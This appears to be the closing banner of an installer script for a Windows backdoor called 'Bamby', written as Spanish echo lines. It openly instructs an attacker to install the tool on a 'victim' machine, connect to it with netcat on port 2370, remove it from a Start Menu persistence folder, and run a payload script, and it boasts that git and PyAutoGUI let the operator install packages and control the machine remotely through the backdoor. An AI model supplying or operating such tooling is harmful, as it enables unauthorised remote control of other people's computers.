echo "* Antes de instalar Bamby en su victima es necesario que instale nmap"
echo "* Es opcional que instale git"
echo "* Asegurese de instalarlo en %UserProfile%\Documents\Bamby"
echo "----------------------Bambi | Atacante----------------------"
echo "* Comando de conexion    :    netcat <ip_victim> 2370"
echo "* Comandos de desactivacion    :"
echo "cd %UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Bambi"
echo "python disable.pyw"
echo "+++----------------+++Bambi | Exploits+++----------------+++"
echo "cd %UserProfile%\AppData"
echo "python payload.py"
echo "------------------------------------------------------------"
echo "[*] Git esta instalado para quie puedas instalar paquetes directamente desde la puerta trasera"
echo "[*] Instalé PyautoGUI para que puedas usar sus funciones con python de forma remota"
echo "Fue un placer trabajar con bambi v‿v"
echo "bye, saluda a d4kox de mi parte. Soy d4kit0 v_X"
